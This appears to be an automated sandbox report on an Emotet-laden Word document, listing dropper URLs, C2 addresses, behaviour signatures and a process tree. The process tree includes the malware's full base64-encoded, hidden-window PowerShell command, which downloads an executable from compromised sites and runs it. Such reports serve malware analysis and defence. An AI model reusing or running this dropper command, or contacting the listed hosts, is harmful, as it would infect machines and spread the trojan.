Analysis

  • max time kernel
    136s
  • resource
    win7v191014
  • submitted
    11-12-2019 04:53

General

  • Target

    Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc

  • Sample

    191211-f8fmpds2me

  • SHA256

    4ee0bf78e3b0a06c35fed0f912db6fabbb5fae13f838cd4132634359ad0d24da

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.prorites.com/wp-content/dsdb28de-kw0ch1msvi-003/

exe.dropper

https://www.silvesterinmailand.com/wp-content/uploads/ibvgux-yg4-03475/

exe.dropper

http://homemyland.net/tmp/wUHdeBS/

exe.dropper

https://www.celbra.com.br/old/wp-content/uploads/2019/mbwl6-lwu0psmcb-523/

exe.dropper

http://prihlaska.sagitta.cz/wp-content/uploads/WwcQXtRta/

Extracted

Family

emotet

C2

200.41.121.69:443

153.190.41.185:80

165.100.148.200:443

103.9.145.19:8080

46.105.128.215:8080

172.105.213.30:80

69.30.205.162:7080

172.104.70.207:8080

198.57.217.170:8080

103.122.75.218:80

212.112.113.235:80

113.52.135.33:7080

60.53.3.153:8080

1.32.54.12:8080

142.93.87.198:8080

91.117.31.181:80

45.129.121.222:443

186.215.101.106:80

143.95.101.72:8080

187.233.220.93:443

rsa_pubkey.plain

Signatures

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 136 IoCs
  • Modifies system certificate store 2 TTPs 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    PID:1424
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABCAHgAdQBoAGkAaABuAHIAdwBrAHoAbgBiAD0AJwBRAHIAYQBnAGkAcAB4AHcAZwAnADsAJABBAG4AdwBtAGkAdwBiAHUAegBoAHAAIAA9ACAAJwAyADEANgAnADsAJABUAHoAbgBsAG8AaQB5AGoAZgA9ACcASABzAHcAeQBkAGQAdwB5AGcAaQBzAGQAaAAnADsAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBuAHcAbQBpAHcAYgB1AHoAaABwACsAJwAuAGUAeABlACcAOwAkAEEAZwBkAGIAbgBjAHAAYQB0AHMAPQAnAEwAZQBkAGUAYwBsAHYAcwBvAGwAcgB0AHQAJwA7ACQAVwBuAGsAdgB4AHcAYgBhAD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAEMATABpAEUAbgBUADsAJABXAHoAagBsAGkAbABqAGMAZQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHAAcgBvAHIAaQB0AGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGQAcwBkAGIAMgA4AGQAZQAtAGsAdwAwAGMAaAAxAG0AcwB2AGkALQAwADAAMwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBpAGwAdgBlAHMAdABlAHIAaQBuAG0AYQBpAGwAYQBuAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AaQBiAHYAZwB1AHgALQB5AGcANAAtADAAMwA0ADcANQAvACoAaAB0AHQAcAA6AC8ALwBoAG8AbQBlAG0AeQBsAGEAbgBkAC4AbgBlAHQALwB0AG0AcAAvAHcAVQBIAGQAZQBCAFMALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAZQBsAGIAcgBhAC4AYwBvAG0ALgBiAHIALwBvAGwAZAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AMgAwADEAOQAvAG0AYgB3AGwANgAtAGwAdwB1ADAAcABzAG0AYwBiAC0ANQAyADMALwAqAGgAdAB0AHAAOgAvAC8AcAByAGkAaABsAGEAcwBrAGEALgBzAGEAZwBpAHQAdABhAC4AYwB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBXAHcAYwBRAFgAdABSAHQAYQAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABNAHkAYgB3AGYAZQBmAGgAcgA9ACcAUgB0AHMAcwBkAGcAdQBlAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAbABxAHYAcQBnAHMAZgB4AGoAYwByAGEAIABpAG4AIAAkAFcAegBqAGwAaQBsAGoAYwBlACkAewB0AHIAeQB7ACQAVwBuAGsAdgB4AHcAYgBhAC4AIgBEAG8AYABXAG4ATABgAE8AQQBkAEYAaQBsAEUAIgAoACQAWgBsAHEAdgBxAGcAcwBmAHgAagBjAHIAYQAsACAAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegApADsAJABEAHAAcgBtAG4AdQBvAHAAPQAnAEUAdgBjAGIAcwB2AGQAdABnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQAuACIAbABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADcANgA2ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQA7ACQAWQB1AGIAYQB2AGkAbAB6AHAAeQBuAGsAdgA9ACcAVABxAGsAdABiAHcAeABtAHkAJwA7AGIAcgBlAGEAawA7ACQATABrAHIAawBlAHcAcQBlAHIAeABrAD0AJwBHAGUAawBzAGcAaQBzAGYAZwByAGoAZAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAYgBoAGQAbABmAHcAYgBoAGUAPQAnAFUAcgB0AGgAaQBkAGwAbQB4AG0AZQAnAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1984
    • C:\Users\Admin\216.exe
      "C:\Users\Admin\216.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      PID:1404
      • C:\Users\Admin\216.exe
        --7272c7d5
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:2016
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-388722206-19565585701416385159-1724534010-776757088-167748554900424385-104918526"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1980
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:1516
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:1332
      • C:\Windows\SysWOW64\rdstextto.exe
        "C:\Windows\SysWOW64\rdstextto.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        • Suspicious use of SetWindowsHookEx
        PID:1956
        • C:\Windows\SysWOW64\rdstextto.exe
          --95f2d49f
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: EmotetMutantsSpam
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          PID:1960

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Install Root Certificate

      1
      T1130

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\216.exe
      • C:\Users\Admin\216.exe
      • C:\Users\Admin\216.exe
      • C:\Windows\SysWOW64\rdstextto.exe
      • C:\Windows\SysWOW64\rdstextto.exe
      • memory/1404-9-0x00000000003E0000-0x00000000003F7000-memory.dmp
        Filesize

        92KB

      • memory/1424-5-0x00000000061B0000-0x00000000063B0000-memory.dmp
        Filesize

        2.0MB

      • memory/1424-0-0x00000000061B0000-0x00000000061B4000-memory.dmp
        Filesize

        16KB

      • memory/1424-4-0x00000000061B0000-0x00000000063B0000-memory.dmp
        Filesize

        2.0MB

      • memory/1424-3-0x0000000008F20000-0x0000000008F24000-memory.dmp
        Filesize

        16KB

      • memory/1956-14-0x0000000000600000-0x0000000000617000-memory.dmp
        Filesize

        92KB

      • memory/1960-16-0x0000000000300000-0x0000000000317000-memory.dmp
        Filesize

        92KB

      • memory/1960-17-0x0000000000400000-0x0000000000492000-memory.dmp
        Filesize

        584KB

      • memory/2016-11-0x0000000000280000-0x0000000000297000-memory.dmp
        Filesize

        92KB

      • memory/2016-12-0x0000000000400000-0x0000000000492000-memory.dmp
        Filesize

        584KB